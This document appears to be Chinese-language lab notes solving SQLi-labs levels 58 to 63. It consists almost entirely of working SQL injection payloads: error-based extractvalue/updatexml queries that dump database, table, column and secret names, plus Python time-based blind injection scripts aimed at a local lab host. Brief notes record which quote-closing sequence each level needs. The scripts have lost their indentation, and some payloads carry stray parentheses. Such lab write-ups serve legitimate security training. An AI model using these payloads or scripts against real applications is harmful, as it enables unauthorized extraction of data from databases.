58.
1'and(extractvalue(1,concat(0x5c,database()))) --+
1'and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'))) --+
1'and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='57512wa1kp'))) --+
1'and extractvalue(1,concat(0x5c,(select secret_9OMH from challenges.57512wa1kp))) --+
59.
数字型注入
1 and updatexml(1,concat(0x7e,database(),0x7e),1) --+
1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+
1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='92axx5dz9i'),0x7e),1) --+
1 and updatexml(1,concat(0x7e,(select secret_FG61 from challenges.92axx5dz9i),0x7e),1) --+
60.
通过报错信息知道是")
1") and extractvalue(1,concat(0x5c,database())) --+
1")and extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'))) --+
1")and extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='4vekw18bge'))) --+
1")and extractvalue(1,concat(0x5c,(select secret_D37R from challenges.4vekw18bge ))) --+
61.
通过报错知道是'))
1'))and updatexml(1,concat(0x7e,database(),0x7e),1) --+
1'))and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1) --+
1'))and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='7w8f94pfzj'),0x7e),1) --+
1'))and updatexml(1,concat(0x7e,(select secret_3AYU from challenges.7w8f94pfzj),0x7e),1) --+
62.
通过测试1 1’ 1” 1‘ 1=1 1=0 得到是1’)
这里没有报错使用时间盲注
数据库名
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
表名
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges' ),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
列名
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='ecp79t9ngr' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
得到数据
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr((select secret_ag65 from challenges.ecp79t9ngr limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
总脚本
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges' ),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
while True:
for char in charset:
payload = f"1') and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='ecp79t9ngr' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1') and if(substr((select secret_ag65 from challenges.ecp79t9ngr limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-62?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
63.
测试发现是‘
def database():
database_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr(database(),{len (database_name) + 1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-63?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
database_name += char
print(f"数据库名称为:{database_name}")
break
else:
break
return database_name
datas = database()
print("最终数据库名称为:",datas)
def tablename():
table_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges' ),{len(table_name) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-63?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
table_name += char
print(f"表名称为:{table_name}")
break
else:
break
return table_name
tbales = tablename()
print("最终表名称为:",tbales)
def columnname():
column_name = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
while True:
for char in charset:
payload = f"1' and if(substr((select column_name from information_schema.columns where table_schema='challenges' and table_name='ecp79t9ngr' limit 2,1),{len(column_name ) +1},1)='{char}',sleep(2),0) --+)"
url = f"http://192.168.1.200:86/Less-63?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
column_name += char
print(f"列名称为:{column_name}")
break
else:
break
return column_name
columns = columnname()
print("最终列名称为:",columns)
def data():
data = ""
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
while True:
for char in charset:
payload = f"1' and if(substr((select secret_ag65 from challenges.ecp79t9ngr limit 0,1),{len(data) +1},1)='{char}',sleep(2),0) --+"
url = f"http://192.168.1.200:86/Less-63?id={payload}"
start_time = time.time()
rsp =requests.get(url)
end_time = time.time()
rsp_time = end_time - start_time
if rsp_time >= 2:
data += char
print(f"数据为:{data}")
break
else:
break
return data
datas = data()
print("最终数据为:",datas)
这里的表名,列名要根据爆破出来的进行修改